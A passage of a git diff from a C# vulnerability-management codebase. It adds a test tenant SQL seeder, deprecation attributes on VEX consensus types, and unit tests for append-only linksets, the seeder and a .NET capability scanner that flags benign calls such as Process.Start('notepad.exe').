+ var sb = new System.Text.StringBuilder();
+ sb.AppendLine("-- Authority tenant seed data (AOC-19-004)");
+ sb.AppendLine("INSERT INTO auth.tenants (id, slug, name, description, contact_email, enabled, settings, metadata, created_at, updated_at, created_by)");
+ sb.AppendLine("VALUES");
+
+ var now = DateTimeOffset.UtcNow;
+ var lines = new List();
+ foreach (var tenant in _tenants)
+ {
+ var settingsJson = JsonSerializer.Serialize(tenant.Settings, JsonOptions);
+ var metadataJson = JsonSerializer.Serialize(tenant.Metadata, JsonOptions);
+ lines.Add($" ('{tenant.Id}', '{EscapeSql(tenant.Slug)}', '{EscapeSql(tenant.Name)}', {NullableString(tenant.Description)}, NULL, {(tenant.Enabled ? "TRUE" : "FALSE")}, '{EscapeSql(settingsJson)}', '{EscapeSql(metadataJson)}', '{now:O}', '{now:O}', 'test-seeder')");
+ }
+
+ sb.AppendLine(string.Join(",\n", lines));
+ sb.AppendLine("ON CONFLICT (slug) DO NOTHING;");
+ return sb.ToString();
+ }
+
+ private void AddTenant(TestTenant tenant)
+ {
+ if (_usedSlugs.Contains(tenant.Slug))
+ {
+ return;
+ }
+
+ _usedSlugs.Add(tenant.Slug);
+ _tenants.Add(tenant);
+ }
+
+ private static string EscapeSql(string value) => value.Replace("'", "''");
+
+ private static string NullableString(string? value) =>
+ value is null ? "NULL" : $"'{EscapeSql(value)}'";
+
+ private static readonly JsonSerializerOptions JsonOptions = new(JsonSerializerDefaults.Web)
+ {
+ WriteIndented = false
+ };
+}
+
+///
+/// Test tenant fixture record.
+///
+public sealed record TestTenant(
+ Guid Id,
+ string Slug,
+ string Name,
+ string? Description,
+ bool Enabled,
+ TestTenantSettings Settings,
+ TestTenantMetadata Metadata);
+
+///
+/// Test tenant settings.
+///
+public sealed record TestTenantSettings(
+ int MaxProviders,
+ int MaxObservationsPerLinkset,
+ bool AllowExternalConnectors,
+ bool AllowAirgapMode,
+ int RetentionDays)
+{
+ ///
+ /// Default test tenant settings.
+ ///
+ public static TestTenantSettings Default { get; } = new TestTenantSettings(
+ MaxProviders: 50,
+ MaxObservationsPerLinkset: 1000,
+ AllowExternalConnectors: true,
+ AllowAirgapMode: false,
+ RetentionDays: 365);
+
+ ///
+ /// Airgap-mode tenant settings.
+ ///
+ public static TestTenantSettings Airgap { get; } = new TestTenantSettings(
+ MaxProviders: 20,
+ MaxObservationsPerLinkset: 500,
+ AllowExternalConnectors: false,
+ AllowAirgapMode: true,
+ RetentionDays: 730);
+}
+
+///
+/// Test tenant metadata.
+///
+public sealed record TestTenantMetadata(
+ string Environment,
+ string Region,
+ string Tier,
+ ImmutableArray Features)
+{
+ ///
+ /// Default test tenant metadata.
+ ///
+ public static TestTenantMetadata Default { get; } = new TestTenantMetadata(
+ Environment: "test",
+ Region: "local",
+ Tier: "free",
+ Features: ImmutableArray.Empty);
+}
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensus.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensus.cs
index 12f342e8f..9b3c252b1 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensus.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensus.cs
@@ -3,6 +3,15 @@ using System.Runtime.Serialization;
namespace StellaOps.Excititor.Core;
+///
+/// Represents a VEX consensus result from weighted voting.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensus
{
public VexConsensus(
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusPolicyOptions.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusPolicyOptions.cs
index abc3ef41c..c09aea9de 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusPolicyOptions.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusPolicyOptions.cs
@@ -2,6 +2,15 @@ using System.Collections.Immutable;
namespace StellaOps.Excititor.Core;
+///
+/// Configuration options for consensus policy weights.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusPolicyOptions
{
public const string BaselineVersion = "baseline/v1";
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusResolver.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusResolver.cs
index 6f81233df..fc51d489b 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusResolver.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusResolver.cs
@@ -3,6 +3,15 @@ using System.Globalization;
namespace StellaOps.Excititor.Core;
+///
+/// Resolves VEX consensus from multiple claims using weighted voting.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed class VexConsensusResolver
{
private readonly IVexConsensusPolicy _policy;
@@ -273,6 +282,14 @@ public sealed class VexConsensusResolver
};
}
+///
+/// Request model for consensus resolution.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+///
+#pragma warning disable EXCITITOR001 // Using obsolete VexConsensusPolicyOptions
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusRequest(
string VulnerabilityId,
VexProduct Product,
@@ -283,11 +300,26 @@ public sealed record VexConsensusRequest(
VexSignalSnapshot? Signals = null,
string? PolicyRevisionId = null,
string? PolicyDigest = null);
+#pragma warning restore EXCITITOR001
+///
+/// Result of consensus resolution including decision log.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusResolution(
VexConsensus Consensus,
ImmutableArray DecisionLog);
+///
+/// Telemetry record for consensus decision auditing.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusDecisionTelemetry(
string ProviderId,
string DocumentDigest,
diff --git a/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Observations/AppendOnlyLinksetExtractionServiceTests.cs b/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Observations/AppendOnlyLinksetExtractionServiceTests.cs
new file mode 100644
index 000000000..25c8d0652
--- /dev/null
+++ b/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Observations/AppendOnlyLinksetExtractionServiceTests.cs
@@ -0,0 +1,393 @@
+using System;
+using System.Collections.Generic;
+using System.Collections.Immutable;
+using System.Linq;
+using System.Text.Json.Nodes;
+using System.Threading;
+using System.Threading.Tasks;
+using Microsoft.Extensions.Logging.Abstractions;
+using StellaOps.Excititor.Core.Observations;
+using Xunit;
+
+namespace StellaOps.Excititor.Core.UnitTests.Observations;
+
+public class AppendOnlyLinksetExtractionServiceTests
+{
+ private readonly InMemoryAppendOnlyLinksetStore _store;
+ private readonly AppendOnlyLinksetExtractionService _service;
+
+ public AppendOnlyLinksetExtractionServiceTests()
+ {
+ _store = new InMemoryAppendOnlyLinksetStore();
+ _service = new AppendOnlyLinksetExtractionService(
+ _store,
+ NullLogger.Instance);
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_AppendsToStore_WithDeterministicOrdering()
+ {
+ var obs1 = BuildObservation(
+ id: "obs-1",
+ provider: "provider-a",
+ vuln: "CVE-2025-0001",
+ product: "pkg:npm/leftpad",
+ createdAt: DateTimeOffset.Parse("2025-11-20T10:00:00Z"));
+
+ var obs2 = BuildObservation(
+ id: "obs-2",
+ provider: "provider-b",
+ vuln: "CVE-2025-0001",
+ product: "pkg:npm/leftpad",
+ createdAt: DateTimeOffset.Parse("2025-11-20T11:00:00Z"));
+
+ var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs2, obs1 }, CancellationToken.None);
+
+ Assert.Single(results);
+ var result = results[0];
+ Assert.True(result.Success);
+ Assert.True(result.WasCreated);
+ Assert.Equal(2, result.ObservationsAdded);
+ Assert.NotNull(result.Linkset);
+ Assert.Equal("CVE-2025-0001", result.Linkset.VulnerabilityId);
+ Assert.Equal("pkg:npm/leftpad", result.Linkset.ProductKey);
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_DeduplicatesObservations()
+ {
+ var obs = BuildObservation(
+ id: "obs-1",
+ provider: "provider-a",
+ vuln: "CVE-2025-0001",
+ product: "pkg:npm/leftpad",
+ createdAt: DateTimeOffset.UtcNow);
+
+ // Process the same observation twice
+ await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
+ var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
+
+ Assert.Single(results);
+ var result = results[0];
+ Assert.True(result.Success);
+ Assert.False(result.WasCreated); // Already exists
+ Assert.Equal(0, result.ObservationsAdded); // Deduplicated
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_GroupsByVulnerabilityAndProduct()
+ {
+ var obs1 = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/foo", DateTimeOffset.UtcNow);
+ var obs2 = BuildObservation("obs-2", "provider-b", "CVE-2025-0001", "pkg:npm/bar", DateTimeOffset.UtcNow);
+ var obs3 = BuildObservation("obs-3", "provider-c", "CVE-2025-0002", "pkg:npm/foo", DateTimeOffset.UtcNow);
+
+ var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs1, obs2, obs3 }, CancellationToken.None);
+
+ Assert.Equal(3, results.Length);
+ Assert.True(results.All(r => r.Success));
+ Assert.True(results.All(r => r.WasCreated));
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_EnforcesTenantIsolation()
+ {
+ var obs = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/leftpad", DateTimeOffset.UtcNow);
+
+ await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
+ var linkset = await _store.GetByKeyAsync("tenant-b", "CVE-2025-0001", "pkg:npm/leftpad", CancellationToken.None);
+
+ Assert.Null(linkset); // Different tenant should not see it
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_ReturnsEmptyForNullOrEmpty()
+ {
+ var results1 = await _service.ProcessObservationsAsync("tenant-a", null!, CancellationToken.None);
+ var results2 = await _service.ProcessObservationsAsync("tenant-a", Array.Empty(), CancellationToken.None);
+
+ Assert.Empty(results1);
+ Assert.Empty(results2);
+ }
+
+ [Fact]
+ public async Task AppendDisagreementAsync_AppendsToExistingLinkset()
+ {
+ var obs = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/leftpad", DateTimeOffset.UtcNow);
+ await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
+
+ var disagreement = new VexObservationDisagreement("provider-b", "not_affected", "inline_mitigations_already_exist", 0.9);
+ var result = await _service.AppendDisagreementAsync(
+ "tenant-a",
+ "CVE-2025-0001",
+ "pkg:npm/leftpad",
+ disagreement,
+ CancellationToken.None);
+
+ Assert.True(result.Success);
+ Assert.Equal(1, result.DisagreementsAdded);
+ Assert.NotNull(result.Linkset);
+ Assert.True(result.Linkset.HasConflicts);
+ }
+
+ [Fact]
+ public async Task AppendDisagreementAsync_CreatesLinksetIfNotExists()
+ {
+ var disagreement = new VexObservationDisagreement("provider-a", "affected", null, null);
+ var result = await _service.AppendDisagreementAsync(
+ "tenant-a",
+ "CVE-2025-9999",
+ "pkg:npm/new-package",
+ disagreement,
+ CancellationToken.None);
+
+ Assert.True(result.Success);
+ Assert.True(result.WasCreated);
+ Assert.Equal(1, result.DisagreementsAdded);
+ }
+
+ private static VexObservation BuildObservation(string id, string provider, string vuln, string product, DateTimeOffset createdAt)
+ {
+ var statement = new VexObservationStatement(
+ vulnerabilityId: vuln,
+ productKey: product,
+ status: VexClaimStatus.Affected,
+ lastObserved: null,
+ locator: null,
+ justification: null,
+ introducedVersion: null,
+ fixedVersion: null,
+ purl: product,
+ cpe: null,
+ evidence: null,
+ metadata: null);
+
+ var upstream = new VexObservationUpstream(
+ upstreamId: $"upstream-{id}",
+ documentVersion: "1",
+ fetchedAt: createdAt,
+ receivedAt: createdAt,
+ contentHash: "sha256:deadbeef",
+ signature: new VexObservationSignature(false, null, null, null));
+
+ var content = new VexObservationContent(
+ format: "openvex",
+ specVersion: "1.0.0",
+ raw: JsonNode.Parse("{}")!,
+ metadata: null);
+
+ var linkset = new VexObservationLinkset(
+ aliases: new[] { vuln },
+ purls: new[] { product },
+ cpes: Array.Empty(),
+ references: Array.Empty());
+
+ return new VexObservation(
+ observationId: id,
+ tenant: "tenant-a",
+ providerId: provider,
+ streamId: "ingest",
+ upstream: upstream,
+ statements: ImmutableArray.Create(statement),
+ content: content,
+ linkset: linkset,
+ createdAt: createdAt);
+ }
+}
+
+///
+/// In-memory implementation of IAppendOnlyLinksetStore for testing.
+///
+internal class InMemoryAppendOnlyLinksetStore : IAppendOnlyLinksetStore
+{
+ private readonly Dictionary _linksets = new();
+ private readonly List _mutations = new();
+ private long _sequenceNumber = 0;
+ private readonly object _lock = new();
+
+ public ValueTask AppendObservationAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexLinksetObservationRefModel observation,
+ VexProductScope scope,
+ CancellationToken cancellationToken)
+ {
+ return AppendObservationsBatchAsync(tenant, vulnerabilityId, productKey, new[] { observation }, scope, cancellationToken);
+ }
+
+ public ValueTask AppendObservationsBatchAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ IEnumerable observations,
+ VexProductScope scope,
+ CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
+ var key = $"{tenant}|{linksetId}";
+ var wasCreated = false;
+ var observationsAdded = 0;
+
+ if (!_linksets.TryGetValue(key, out var linkset))
+ {
+ wasCreated = true;
+ linkset = new VexLinkset(
+ linksetId, tenant, vulnerabilityId, productKey, scope,
+ Enumerable.Empty(),
+ null, DateTimeOffset.UtcNow, DateTimeOffset.UtcNow);
+ _linksets[key] = linkset;
+
+ _mutations.Add(new LinksetMutationEvent(
+ ++_sequenceNumber, LinksetMutationEvent.MutationTypes.LinksetCreated,
+ DateTimeOffset.UtcNow, null, null, null, null, null));
+ }
+
+ var existingObsIds = new HashSet(
+ linkset.Observations.Select(o => o.ObservationId),
+ StringComparer.Ordinal);
+
+ var newObservations = observations
+ .Where(o => !existingObsIds.Contains(o.ObservationId))
+ .ToList();
+
+ if (newObservations.Count > 0)
+ {
+ var allObservations = linkset.Observations.Concat(newObservations);
+ linkset = linkset.WithObservations(allObservations, linkset.Disagreements);
+ _linksets[key] = linkset;
+ observationsAdded = newObservations.Count;
+
+ foreach (var obs in newObservations)
+ {
+ _mutations.Add(new LinksetMutationEvent(
+ ++_sequenceNumber, LinksetMutationEvent.MutationTypes.ObservationAdded,
+ DateTimeOffset.UtcNow, obs.ObservationId, obs.ProviderId, obs.Status, obs.Confidence, null));
+ }
+ }
+
+ return ValueTask.FromResult(wasCreated
+ ? AppendLinksetResult.Created(linkset, observationsAdded, _sequenceNumber)
+ : (observationsAdded > 0
+ ? AppendLinksetResult.Updated(linkset, observationsAdded, 0, _sequenceNumber)
+ : AppendLinksetResult.NoChange(linkset, _sequenceNumber)));
+ }
+ }
+
+ public ValueTask AppendDisagreementAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexObservationDisagreement disagreement,
+ CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
+ var key = $"{tenant}|{linksetId}";
+ var wasCreated = false;
+
+ if (!_linksets.TryGetValue(key, out var linkset))
+ {
+ wasCreated = true;
+ var scope = VexProductScope.Unknown(productKey);
+ linkset = new VexLinkset(
+ linksetId, tenant, vulnerabilityId, productKey, scope,
+ Enumerable.Empty(),
+ null, DateTimeOffset.UtcNow, DateTimeOffset.UtcNow);
+ }
+
+ var allDisagreements = linkset.Disagreements.Append(disagreement);
+ linkset = linkset.WithObservations(linkset.Observations, allDisagreements);
+ _linksets[key] = linkset;
+
+ _mutations.Add(new LinksetMutationEvent(
+ ++_sequenceNumber, LinksetMutationEvent.MutationTypes.DisagreementAdded,
+ DateTimeOffset.UtcNow, null, disagreement.ProviderId, disagreement.Status,
+ disagreement.Confidence, disagreement.Justification));
+
+ return ValueTask.FromResult(wasCreated
+ ? AppendLinksetResult.Created(linkset, 0, _sequenceNumber)
+ : AppendLinksetResult.Updated(linkset, 0, 1, _sequenceNumber));
+ }
+ }
+
+ public ValueTask GetByIdAsync(string tenant, string linksetId, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var key = $"{tenant}|{linksetId}";
+ _linksets.TryGetValue(key, out var linkset);
+ return ValueTask.FromResult(linkset);
+ }
+ }
+
+ public ValueTask GetByKeyAsync(string tenant, string vulnerabilityId, string productKey, CancellationToken cancellationToken)
+ {
+ var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
+ return GetByIdAsync(tenant, linksetId, cancellationToken);
+ }
+
+ public ValueTask> FindByVulnerabilityAsync(string tenant, string vulnerabilityId, int limit, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var results = _linksets.Values
+ .Where(l => l.Tenant == tenant && string.Equals(l.VulnerabilityId, vulnerabilityId, StringComparison.OrdinalIgnoreCase))
+ .Take(limit)
+ .ToList();
+ return ValueTask.FromResult>(results);
+ }
+ }
+
+ public ValueTask> FindByProductKeyAsync(string tenant, string productKey, int limit, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var results = _linksets.Values
+ .Where(l => l.Tenant == tenant && string.Equals(l.ProductKey, productKey, StringComparison.OrdinalIgnoreCase))
+ .Take(limit)
+ .ToList();
+ return ValueTask.FromResult>(results);
+ }
+ }
+
+ public ValueTask> FindWithConflictsAsync(string tenant, int limit, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var results = _linksets.Values
+ .Where(l => l.Tenant == tenant && l.HasConflicts)
+ .Take(limit)
+ .ToList();
+ return ValueTask.FromResult>(results);
+ }
+ }
+
+ public ValueTask CountAsync(string tenant, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var count = _linksets.Values.Count(l => l.Tenant == tenant);
+ return ValueTask.FromResult((long)count);
+ }
+ }
+
+ public ValueTask CountWithConflictsAsync(string tenant, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var count = _linksets.Values.Count(l => l.Tenant == tenant && l.HasConflicts);
+ return ValueTask.FromResult((long)count);
+ }
+ }
+
+ public ValueTask> GetMutationLogAsync(string tenant, string linksetId, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ return ValueTask.FromResult>(_mutations.ToList());
+ }
+ }
+}
diff --git a/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Testing/AuthorityTenantSeederTests.cs b/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Testing/AuthorityTenantSeederTests.cs
new file mode 100644
index 000000000..2a910b89b
--- /dev/null
+++ b/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Testing/AuthorityTenantSeederTests.cs
@@ -0,0 +1,231 @@
+using System;
+using System.Collections.Immutable;
+using System.Linq;
+using StellaOps.Excititor.Core.Testing;
+using Xunit;
+
+namespace StellaOps.Excititor.Core.UnitTests.Testing;
+
+public class AuthorityTenantSeederTests
+{
+ [Fact]
+ public void DefaultTenant_HasExpectedValues()
+ {
+ var tenant = AuthorityTenantSeeder.DefaultTenant;
+
+ Assert.NotEqual(Guid.Empty, tenant.Id);
+ Assert.Equal("test", tenant.Slug);
+ Assert.Equal("Test Tenant", tenant.Name);
+ Assert.True(tenant.Enabled);
+ Assert.NotNull(tenant.Settings);
+ Assert.NotNull(tenant.Metadata);
+ }
+
+ [Fact]
+ public void MultiTenantFixtures_ContainsThreeTenants()
+ {
+ var fixtures = AuthorityTenantSeeder.MultiTenantFixtures;
+
+ Assert.Equal(3, fixtures.Length);
+ Assert.Contains(fixtures, t => t.Slug == "acme");
+ Assert.Contains(fixtures, t => t.Slug == "beta");
+ Assert.Contains(fixtures, t => t.Slug == "gamma");
+ }
+
+ [Fact]
+ public void MultiTenantFixtures_GammaIsDisabled()
+ {
+ var gamma = AuthorityTenantSeeder.MultiTenantFixtures.Single(t => t.Slug == "gamma");
+
+ Assert.False(gamma.Enabled);
+ }
+
+ [Fact]
+ public void AirgapTenant_HasRestrictedSettings()
+ {
+ var tenant = AuthorityTenantSeeder.AirgapTenant;
+
+ Assert.Equal("airgap-test", tenant.Slug);
+ Assert.False(tenant.Settings.AllowExternalConnectors);
+ Assert.True(tenant.Settings.AllowAirgapMode);
+ Assert.Equal("airgap", tenant.Metadata.Environment);
+ }
+
+ [Fact]
+ public void WithDefaultTenant_AddsTenantToSeedSet()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithDefaultTenant();
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Single(tenants);
+ Assert.Equal("test", tenants[0].Slug);
+ }
+
+ [Fact]
+ public void WithMultiTenantFixtures_AddsAllFixtures()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithMultiTenantFixtures();
+
+ var tenants = seeder.GetTenants();
+ var slugs = seeder.GetSlugs();
+
+ Assert.Equal(3, tenants.Count);
+ Assert.Contains("acme", slugs);
+ Assert.Contains("beta", slugs);
+ Assert.Contains("gamma", slugs);
+ }
+
+ [Fact]
+ public void WithTenant_AddsDuplicateSlugOnce()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithDefaultTenant()
+ .WithDefaultTenant(); // Duplicate
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Single(tenants);
+ }
+
+ [Fact]
+ public void WithCustomTenant_AddsToSeedSet()
+ {
+ var customTenant = new TestTenant(
+ Id: Guid.NewGuid(),
+ Slug: "custom",
+ Name: "Custom Tenant",
+ Description: "A custom test tenant",
+ Enabled: true,
+ Settings: TestTenantSettings.Default,
+ Metadata: new TestTenantMetadata("test", "local", "free", ImmutableArray.Empty));
+
+ var seeder = new AuthorityTenantSeeder()
+ .WithTenant(customTenant);
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Single(tenants);
+ Assert.Equal("custom", tenants[0].Slug);
+ }
+
+ [Fact]
+ public void WithTenant_SimpleOverload_CreatesMinimalTenant()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithTenant("simple", "Simple Tenant", enabled: false);
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Single(tenants);
+ Assert.Equal("simple", tenants[0].Slug);
+ Assert.Equal("Simple Tenant", tenants[0].Name);
+ Assert.False(tenants[0].Enabled);
+ }
+
+ [Fact]
+ public void GenerateSql_ProducesValidInsertStatements()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithDefaultTenant();
+
+ var sql = seeder.GenerateSql();
+
+ Assert.Contains("INSERT INTO auth.tenants", sql);
+ Assert.Contains("'test'", sql);
+ Assert.Contains("'Test Tenant'", sql);
+ Assert.Contains("ON CONFLICT (slug) DO NOTHING", sql);
+ }
+
+ [Fact]
+ public void GenerateSql_ReturnsEmptyForNoTenants()
+ {
+ var seeder = new AuthorityTenantSeeder();
+
+ var sql = seeder.GenerateSql();
+
+ Assert.Equal(string.Empty, sql);
+ }
+
+ [Fact]
+ public void GenerateSql_EscapesSingleQuotes()
+ {
+ var tenant = new TestTenant(
+ Id: Guid.NewGuid(),
+ Slug: "test-escape",
+ Name: "O'Reilly's Tenant",
+ Description: "Contains 'quotes'",
+ Enabled: true,
+ Settings: TestTenantSettings.Default,
+ Metadata: TestTenantMetadata.Default);
+
+ var seeder = new AuthorityTenantSeeder()
+ .WithTenant(tenant);
+
+ var sql = seeder.GenerateSql();
+
+ Assert.Contains("O''Reilly''s Tenant", sql);
+ }
+
+ [Fact]
+ public void ChainedBuilderPattern_WorksCorrectly()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithDefaultTenant()
+ .WithMultiTenantFixtures()
+ .WithAirgapTenant()
+ .WithTenant("custom", "Custom");
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Equal(5, tenants.Count); // 1 + 3 + 1 (custom)
+ // Note: airgap tenant is separate
+ }
+
+ [Fact]
+ public void TestTenantSettings_Default_HasExpectedValues()
+ {
+ var settings = TestTenantSettings.Default;
+
+ Assert.Equal(50, settings.MaxProviders);
+ Assert.Equal(1000, settings.MaxObservationsPerLinkset);
+ Assert.True(settings.AllowExternalConnectors);
+ Assert.False(settings.AllowAirgapMode);
+ Assert.Equal(365, settings.RetentionDays);
+ }
+
+ [Fact]
+ public void TestTenantSettings_Airgap_HasRestrictedValues()
+ {
+ var settings = TestTenantSettings.Airgap;
+
+ Assert.Equal(20, settings.MaxProviders);
+ Assert.Equal(500, settings.MaxObservationsPerLinkset);
+ Assert.False(settings.AllowExternalConnectors);
+ Assert.True(settings.AllowAirgapMode);
+ Assert.Equal(730, settings.RetentionDays);
+ }
+
+ [Fact]
+ public void TestTenantMetadata_Default_HasExpectedValues()
+ {
+ var metadata = TestTenantMetadata.Default;
+
+ Assert.Equal("test", metadata.Environment);
+ Assert.Equal("local", metadata.Region);
+ Assert.Equal("free", metadata.Tier);
+ Assert.Empty(metadata.Features);
+ }
+
+ [Fact]
+ public void MultiTenantFixtures_AcmeHasFeatures()
+ {
+ var acme = AuthorityTenantSeeder.MultiTenantFixtures.Single(t => t.Slug == "acme");
+
+ Assert.Contains("vex-ingestion", acme.Metadata.Features);
+ Assert.Contains("policy-engine", acme.Metadata.Features);
+ Assert.Contains("graph-explorer", acme.Metadata.Features);
+ }
+}
diff --git a/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.DotNet.Tests/Internal/DotNetCapabilityScannerTests.cs b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.DotNet.Tests/Internal/DotNetCapabilityScannerTests.cs
new file mode 100644
index 000000000..cbfc23735
--- /dev/null
+++ b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.DotNet.Tests/Internal/DotNetCapabilityScannerTests.cs
@@ -0,0 +1,806 @@
+using StellaOps.Scanner.Analyzers.Lang.DotNet.Internal.Capabilities;
+
+namespace StellaOps.Scanner.Analyzers.Lang.DotNet.Tests.Internal;
+
+///
+/// Tests for .
+///
+public sealed class DotNetCapabilityScannerTests
+{
+ private const string TestFile = "Test.cs";
+
+ #region ScanFile - General Tests
+
+ [Fact]
+ public void ScanFile_NullContent_ReturnsEmpty()
+ {
+ var result = DotNetCapabilityScanner.ScanFile(null!, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_EmptyContent_ReturnsEmpty()
+ {
+ var result = DotNetCapabilityScanner.ScanFile("", TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_WhitespaceContent_ReturnsEmpty()
+ {
+ var result = DotNetCapabilityScanner.ScanFile(" \n\t\n ", TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NoPatterns_ReturnsEmpty()
+ {
+ const string code = @"
+namespace Test
+{
+ public class Program
+ {
+ public static void Main() => Console.WriteLine(""Hello"");
+ }
+}";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NormalizesBackslashesInPath()
+ {
+ const string code = @"Process.Start(""notepad.exe"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, @"C:\src\Test.cs");
+
+ Assert.Single(result);
+ Assert.Equal("C:/src/Test.cs", result[0].SourceFile);
+ }
+
+ [Fact]
+ public void ScanFile_DeduplicatesSamePatternOnSameLine()
+ {
+ const string code = @"Process.Start(""cmd""); Process.Start(""notepad"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ // Same pattern on same line should be deduplicated
+ Assert.Single(result);
+ }
+
+ #endregion
+
+ #region ScanFile - Comment Stripping
+
+ [Fact]
+ public void ScanFile_IgnoresSingleLineComments()
+ {
+ const string code = @"
+// Process.Start(""cmd"");
+public void Method() { }";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresMultiLineComments()
+ {
+ const string code = @"
+/*
+Process.Start(""cmd"");
+File.Delete(""file.txt"");
+*/
+public void Method() { }";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ #endregion
+
+ #region ScanFile - Exec Patterns
+
+ [Fact]
+ public void ScanFile_DetectsProcessStart()
+ {
+ const string code = @"Process.Start(""notepad.exe"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("Process.Start", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ Assert.Equal(1.0f, result[0].Confidence);
